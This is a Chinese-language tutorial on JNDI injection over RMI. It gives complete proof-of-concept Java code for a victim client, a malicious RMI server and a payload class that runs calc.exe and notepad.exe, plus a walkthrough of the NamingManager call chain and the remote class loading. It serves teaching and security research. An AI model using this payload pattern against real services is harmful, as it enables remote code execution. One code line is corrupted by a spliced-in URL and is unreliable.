JNDI注入分析-RMI注入 javajndi

【JNDI注入分析-RMI注入】Java命名和目录接口（JNDI）是一种Java API，类似于一个索引中心，它允许客户端通过name发现和查找数据和对象。这些对象可以存储在lDAP，DNS中，或者RMI
代码格式如下：

InitialContext var1 = new InitialContext(); DataSource var2 = (DataSource)var1.lookup("rmi://127.0.0.1:1099/Exploit");

JNDI注入
JNDI注入就是当jndiname变量可控时导致远程class文件被加载，导致远程代码执行
当前环境java8u121
Client.java程序(受害者)

package org.joychou.jndiInjection; import javax.naming.InitialContext; import javax.naming.Context; public class Client { public static void main(String[] args) throws Exception{ String uri = "rmi://127.0.0.1:1099/aa"; System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true"); Context ctx = new InitialContext(); ctx.lookup(uri); } }

Server.java（服务器端）

package org.joychou.jndiInjection; import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.Reference; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; public class Server { public static void main(String[] args) throws Exception{ Registry registry = LocateRegistry.createRegistry(1099); Reference aa = new Reference("ExecTest", "ExecTest", "http://127.0.0.1:8081/"); ReferenceWrapper refObjWrapper = new ReferenceWrapper(aa); System.out.println("Binding 'refObjWrapper' to 'rmi://127.0.0.1:1099/aa'"); registry.bind("aa", refObjWrapper); } }

ExecTest.java(命令执行的类)

//package org.joychou.jndiInjection; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.Reader; public class ExecTest { public ExecTest() throws IOException,InterruptedException{ String cmd="calc.exe"; final Process process = Runtime.getRuntime().exec(cmd); printMessage(process.getInputStream()); ; printMessage(process.getErrorStream()); int value=https://www.it610.com/article/process.waitFor(); System.out.println(value); }private static void printMessage(final InputStream input) { // TODO Auto-generated method stub new Thread (new Runnable() { @Override public void run() { // TODO Auto-generated method stub Reader reader =new InputStreamReader(input); BufferedReader bf = new BufferedReader(reader); String line = null; try { while ((line=bf.readLine())!=null) { System.out.println(line); } }catch (IOExceptione){ e.printStackTrace(); } } }).start(); } }

编译ExecTest.java，并开启http服务，然后开启Server.java，然后运行Client.java

文章图片

调用链分析

//InitialContext.java public Object lookup(String name) throws NamingException { return getURLOrDefaultInitCtx(name).lookup(name); } getURLOrDefaultInitCtx函数，这个类会根据输入的name寻找合适的URL context，根据我们输入的变量中会返回 rmiURLContext对象（继承自GenericURLContext类） protected Context getURLOrDefaultInitCtx(String name) throws NamingException { if (NamingManager.hasInitialContextFactoryBuilder()) { return getDefaultInitCtx(); } String scheme = getURLScheme(name); if (scheme != null) { Context ctx = NamingManager.getURLContext(scheme, myProps); if (ctx != null) { return ctx; } } return getDefaultInitCtx(); }

在返回rmiURLContext对象之后会继而调用该对象的lookup方法，该方法对rmi地址进行解析

//GenericURLContext.java public Object lookup(String var1) throws NamingException { ResolveResult var2 = this.getRootURLContext(var1, this.myEnv); //对rmi地址进行解析 Context var3 = (Context)var2.getResolvedObj(); // 返回注册上下文RegistryContextObject var4; try { var4 = var3.lookup(var2.getRemainingName()); //调用注册上下文lookup函数查找aa对象 } finally { var3.close(); }return var4; }

RegistryContext.java中的lookup在注册器中函数寻找aa对象对应的引用

//RegistryContext.java public Object lookup(Name var1) throws NamingException { if (var1.isEmpty()) { return new RegistryContext(this); } else { Remote var2; try { var2 = this.registry.lookup(var1.get(0)); //查找aa对应的远程引用ReferenceWrapper } catch (NotBoundException var4) { throw new NameNotFoundException(var1.get(0)); } catch (RemoteException var5) { throw (NamingException)wrapRemoteException(var5).fillInStackTrace(); }return this.decodeObject(var2, var1.getPrefix(1)); // } }

decodeObject方法找到我们要生成的远程对象

//RegistryContext.java private Object decodeObject(Remote var1, Name var2) throws NamingException {//var1:ReferenceWrapper, var2: aa try { //这里会判断我们的var1是否是remoteReference，如果是的话会进入getReference(),与服务器进行一次连接 Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1; Reference var8 = null; if (var3 instanceof Reference) { var8 = (Reference)var3; } else if (var3 instanceof Referenceable) { var8 = ((Referenceable)((Referenceable)var3)).getReference(); } //java更新的一项安全机制，需要将com.sun.jndi.rmi.object.trustURLCodebase设置为true if (var8 != null && var8.getFactoryClassLocation() != null && !trustURLCodebase) { throw new ConfigurationException("The object factory is untrusted. Set the system property 'com.sun.jndi.rmi.object.trustURLCodebase' to 'true'."); } else { return NamingManager.getObjectInstance(var3, var2, this, this.environment); //该函数根据输入的对象和环境信息生成指定的对象 }

到此已经通过远程请求获取到了aa对应的ExecTest类，接下来是进行实例化

//NamingManager.java public static Object getObjectInstance(...){//在对象工厂检索由引用标识的对象，使用引用的工厂类名和工厂代码库加载到工厂的类中。 ... if (ref != null) { String f = ref.getFactoryClassName(); if (f != null) { // if reference identifies a factory, use exclusivelyfactory = getObjectFactoryFromReference(ref, f); //命令执行点 if (factory != null) { return factory.getObjectInstance(ref, name, nameCtx, environment); } getObjectFactoryFromReference函数通过引用将对象进行实例化 //NamingManager.java static ObjectFactory getObjectFactoryFromReference( Reference ref, String factoryName) throws IllegalAccessException, InstantiationException, MalformedURLException { Class clas = null; // Try to use current class loader try { clas = helper.loadClass(factoryName); //在本地classpath中寻找class，代码会进入此分支 } catch (ClassNotFoundException e) { // ignore and continue // e.printStackTrace(); } // All other exceptions are passed up.// Not in class path; try to use codebase String codebase; if (clas == null && (codebase = ref.getFactoryClassLocation()) != null) { try {//加载远程codebase，就是我们定义的恶意RMI服务器 clas = helper.loadClass(factoryName, codebase); } catch (ClassNotFoundException e) { } } //实例化恶意的class文件 return (clas != null) ? (ObjectFactory) clas.newInstance() : null; }

小缺陷
这段payload虽然能正常运行，但在运行时会报错，我们来尝试修改代码修复其错误
Exception in thread "main" javax.naming.NamingException [Root exception is java.lang.ClassCastException: ExecTest cannot be cast to javax.naming.spi.ObjectFactory
这个报错的触发原因是我们实例化的ExecTest类无法被转换为ObjectFactory类

//NamingManager.java //实例化恶意的class文件 return (clas != null) ? (ObjectFactory) clas.newInstance() : null; //执行该语句时进行类型强制转换报错

所以我们这里将我们的恶意类重写为继承自ObjectFactory的类即可，新版payload如下：

//package org.joychou.jndiInjection; import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFactory; import java.io.IOException; import java.util.Hashtable; public class ExecTest implements ObjectFactory { public ExecTest() throws IOException,InterruptedException{ Runtime.getRuntime().exec("calc.exe"); }@Override public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws IOException{ Runtime.getRuntime().exec("notepad.exe"); return null; } }

实际上我们只需要在上述的两个函数中任意一个写入命令即可，上文所写的两个命令都会被执行。为什么会执行两次呢？
第一次执行

//NamingManager.java return (clas != null) ? (ObjectFactory) clas.newInstance() : null;

在调用newInstance方法实例化ExecTest类的时候会默认调用ExecTest类的无参构造方法，相当于new Exectest()，所以无参构造函数中的命令会被执行。
第二次执行

//NamingManager.java public static Object getObjectInstance(...){//在对象工厂检索由引用标识的对象，使用引用的工厂类名和工厂代码库加载到工厂的类中。 ... if (ref != null) { String f = ref.getFactoryClassName(); if (f != null) { // if reference identifies a factory, use exclusivelyfactory = getObjectFactoryFromReference(ref, f); if (factory != null) { return factory.getObjectInstance(ref, name, nameCtx, environment); //第二次命令执行 }

在第一次执行之后会返回ObjectFactory，这样就会调用factory类的getObjectInstance方法，从而进行了第二次命令执行
类加载顺序
当前的项目结构为：

文章图片

事实上，这样结构下不需要编译ExecTest类，也不需要开启http服务只要开启Server.java，运行Client.java即可执行命令

文章图片

也就是说，我们其实并没有访问我们的远程类就完成了攻击，作为对比测试，我们将Client.java和ExecTest.java分开运行，不过运行之后没有任何命令被执行。

文章图片

我们在刚才的Server.java服务器端编译ExecTest.java文件，并开启http服务

D:\Workspace\java\JndiRmi\src\main\java>"c:\Program Files\Java\jdk1.8.0_112\bin\javac.exe" ExecTest.java D:\Workspace\java\JndiRmi\src\main\java>python -m SimpleHTTPServer 8081 Serving HTTP on 0.0.0.0 port 8081 ...

这样我们开启Server.java，然后开启另一个目录下的Client.java即可远程加载类

文章图片

查看http服务端可以看到我们的远程类被远程加载了

D:\Workspace\java\JndiRmi\src\main\java>python -m SimpleHTTPServer 8081 Serving HTTP on 0.0.0.0 port 8081 ... 127.0.0.1 - - [19/Dec/2021 13:57:25] "GET /ExecTest.class HTTP/1.1" 200 -

为什么Client位置的不同会导致类的加载位置不同呢？将Client.java单独和与ExecTest.java对比运行：

文章图片

从调试可以看出，Client.java在实例化类的时候会先使用本地的类加载器进行加载，如果本地找不到的话才会找远程的代码库(codebase)进行加载，左侧在本地可以找到ExecTest类进行加载，而在右侧的本地找不到ExecTest类，会通过RMI远程加载，但是因为我们没开启http服务，所以找不到ExecTest类，导致实例化失败，无法命令执行。
所以，只要将ExecTest.java类与Client.java放在同一目录就不会进行远程加载。